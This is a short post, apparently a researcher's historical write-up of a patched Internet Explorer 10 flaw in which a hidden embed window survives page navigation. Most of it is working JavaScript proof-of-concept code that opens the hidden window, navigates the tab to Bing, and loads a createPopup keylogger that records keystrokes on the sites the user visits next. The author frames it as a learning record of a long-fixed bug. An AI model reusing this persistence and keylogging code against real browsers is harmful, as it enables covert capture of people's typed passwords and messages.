This one surprised me. By creating a hidden <embed type="text/html"> element in a new window, saving a reference to its internal window object, and then navigating the outer window away, the embed’s window persists invisibly. Loading a createPopup keylogger into that hidden window lets it capture keystrokes on whatever site the user navigates to next.

var oHtmlEmbedWin;

function main() {
    var win = window.open("about:blank");

    win.document.body.innerHTML = '<embed id="HtmlEmbed" type="text/html" src=""></embed>';
    oHtmlEmbedWin = win.document.all.HtmlEmbed.getSVGDocument().parentWindow;

    win.location = "http://www.bing.com";

    setTimeout('oHtmlEmbedWin.location = "popup.html";', 1000);
}
// popup.html: loads a createPopup keylogger that stays on screen
var cp = createPopup();
var str = '<div style="font-family:Arial;font-size:12px;color:#ffffff;">' +
          'We are at Bing but we are still alive!<br />' +
          '<span style="font-size:12px;color:red;font-weight:bold;" id="typedText">&nbsp;</span><br />' +
          '</div>' +
          '<script defer="defer">' +
          '  document.onkeypress = function(){' +
          '    document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
          '  }' +
          '<\/script>';
cp.document.write(str);
cp.document.close();
cp.document.bgColor = "blue";
setInterval("try{cp.show(200, 0, 700, 120);}catch(e){}", 1000);

The embed’s window remains alive even after the outer tab navigates to Bing, and the createPopup floats visibly over the page capturing every key. The variation folder contains three additional techniques. In Metro mode createPopups do not work, but the resident embed can still fire alerts and prompts. Tested on IE10 Desktop Win8 RTM.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.